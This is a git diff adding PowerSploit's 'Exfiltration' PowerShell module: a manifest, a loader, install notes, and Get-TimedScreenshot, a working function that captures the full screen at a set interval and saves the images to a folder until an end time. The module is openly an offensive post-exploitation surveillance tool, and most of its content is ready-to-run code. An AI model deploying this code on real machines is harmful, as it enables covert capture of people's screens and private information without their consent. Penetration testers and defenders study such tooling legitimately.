4 files changed, 199 insertions, 0 deletions
diff --git a/Exfiltration/Exfiltration.psd1 b/Exfiltration/Exfiltration.psd1
new file mode 100644
index 0000000..7eb9aa2
--- /dev/null
+++ b/Exfiltration/Exfiltration.psd1
@@ -0,0 +1,87 @@
+@{
+
+# Script module or binary module file associated with this manifest.
+ModuleToProcess = 'Exfiltration.psm1'
+
+# Version number of this module.
+ModuleVersion = '1.0.0.0'
+
+# ID used to uniquely identify this module
+GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'
+
+# Author of this module
+Author = 'Matthew Graeber'
+
+# Company or vendor of this module
+CompanyName = ''
+
+# Copyright statement for this module
+Copyright = 'BSD 3-Clause'
+
+# Description of the functionality provided by this module
+Description = 'PowerSploit Exfiltration Module'
+
+# Minimum version of the Windows PowerShell engine required by this module
+PowerShellVersion = '2.0'
+
+# Name of the Windows PowerShell host required by this module
+# PowerShellHostName = ''
+
+# Minimum version of the Windows PowerShell host required by this module
+# PowerShellHostVersion = ''
+
+# Minimum version of the .NET Framework required by this module
+# DotNetFrameworkVersion = ''
+
+# Minimum version of the common language runtime (CLR) required by this module
+# CLRVersion = ''
+
+# Processor architecture (None, X86, Amd64) required by this module
+# ProcessorArchitecture = ''
+
+# Modules that must be imported into the global environment prior to importing this module
+# RequiredModules = @()
+
+# Assemblies that must be loaded prior to importing this module
+# RequiredAssemblies = @()
+
+# Script files (.ps1) that are run in the caller's environment prior to importing this module.
+# ScriptsToProcess = ''
+
+# Type files (.ps1xml) to be loaded when importing this module
+# TypesToProcess = @()
+
+# Format files (.ps1xml) to be loaded when importing this module
+# FormatsToProcess = @()
+
+# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
+# NestedModules = @()
+
+# Functions to export from this module
+FunctionsToExport = '*'
+
+# Cmdlets to export from this module
+CmdletsToExport = '*'
+
+# Variables to export from this module
+VariablesToExport = ''
+
+# Aliases to export from this module
+AliasesToExport = ''
+
+# List of all modules packaged with this module.
+ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'})
+
+# List of all files packaged with this module
+FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Usage.md'
+
+# Private data to pass to the module specified in RootModule/ModuleToProcess
+# PrivateData = ''
+
+# HelpInfo URI of this module
+# HelpInfoURI = ''
+
+# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
+# DefaultCommandPrefix = ''
+
+}
+\ No newline at end of file
diff --git a/Exfiltration/Exfiltration.psm1 b/Exfiltration/Exfiltration.psm1
new file mode 100644
index 0000000..e5234fb
--- /dev/null
+++ b/Exfiltration/Exfiltration.psm1
@@ -0,0 +1 @@
+Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
+\ No newline at end of file
diff --git a/Exfiltration/Get-TimedScreenshot.ps1 b/Exfiltration/Get-TimedScreenshot.ps1
new file mode 100644
index 0000000..3a19a7d
--- /dev/null
+++ b/Exfiltration/Get-TimedScreenshot.ps1
@@ -0,0 +1,99 @@
+Function Get-TimedScreenshot {
+<#
+.SYNOPSIS
+ 
+    Get-TimedScreenshot
+    
+    Author: Chris Campbell (@obscuresec)
+    License: BSD 3-Clause
+    
+.DESCRIPTION
+
+    A function that takes screenshots and saves them to a folder.
+
+.PARAMETER $Path
+
+    Specifies the folder path.
+    
+.PARAMETER $Interval
+    
+    Specifies the interval in seconds between taking screenshots.
+
+.PARAMETER $EndTime
+
+    Specifies when the script should stop running in the format HH-MM 
+
+.EXAMPLE 
+
+    PS C:\> Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00 
+ 
+.LINK
+
+    http://obscuresecurity.blogspot.com/2013/01/Get-TimedScreenshot.html
+    https://github.com/obscuresec/random/blob/master/Get-TimedScreenshot
+
+#>
+
+    [CmdletBinding()] Param(
+            [Parameter(Mandatory=$True)]             
+            [ValidateScript({Test-Path -Path $_ })]
+            [string] $Path, 
+
+            [Parameter(Mandatory=$True)]             
+            [int32] $Interval,
+
+            [Parameter(Mandatory=$True)]             
+            [string] $EndTime    
+            )
+    
+        #Define helper function that generates and saves screenshot
+        Function GenScreenshot {
+           $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen
+           $ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height
+           $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject)
+           $DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size)
+           $DrawingGraphics.Dispose()
+           $ScreenshotObject.Save($FilePath)
+           $ScreenshotObject.Dispose()
+        }
+
+        Try {
+            
+            #load required assembly
+            Add-Type -Assembly System.Windows.Forms            
+
+            Do {
+                #get the current time and build the filename from it
+                $Time = (Get-Date)
+                
+                [string] $FileName = "$($Time.Month)"
+                $FileName += '-'
+                $FileName += "$($Time.Day)" 
+                $FileName += '-'
+                $FileName += "$($Time.Year)"
+                $FileName += '-'
+                $FileName += "$($Time.Hour)"
+                $FileName += '-'
+                $FileName += "$($Time.Minute)"
+                $FileName += '-'
+                $FileName += "$($Time.Second)"
+                $FileName += '.png'
+            
+                #use join-path to add path to filename
+                [string] $FilePath = (Join-Path $Path $FileName)
+
+                #run screenshot function
+                GenScreenshot
+                
+                Write-Verbose "Saved screenshot to $FilePath. Sleeping for $Interval seconds"
+
+                Start-Sleep -Seconds $Interval
+            }
+
+            #note that this will run once regardless if the specified time as passed
+            While ((Get-Date -Format HH:%m) -lt $EndTime)
+        }
+
+       Catch {Write-Warning "$Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage"}
+
+}
+\ No newline at end of file
diff --git a/Exfiltration/Usage.md b/Exfiltration/Usage.md
new file mode 100644
index 0000000..dfdaabb
--- /dev/null
+++ b/Exfiltration/Usage.md
@@ -0,0 +1,12 @@
+To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
+
+The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
+The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
+
+To use the module, type `Import-Module Exfiltration`
+
+To see the commands imported, type `Get-Command -Module Exfiltration`
+
+For help on each individual command, Get-Help is your friend.
+
+Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
+\ No newline at end of file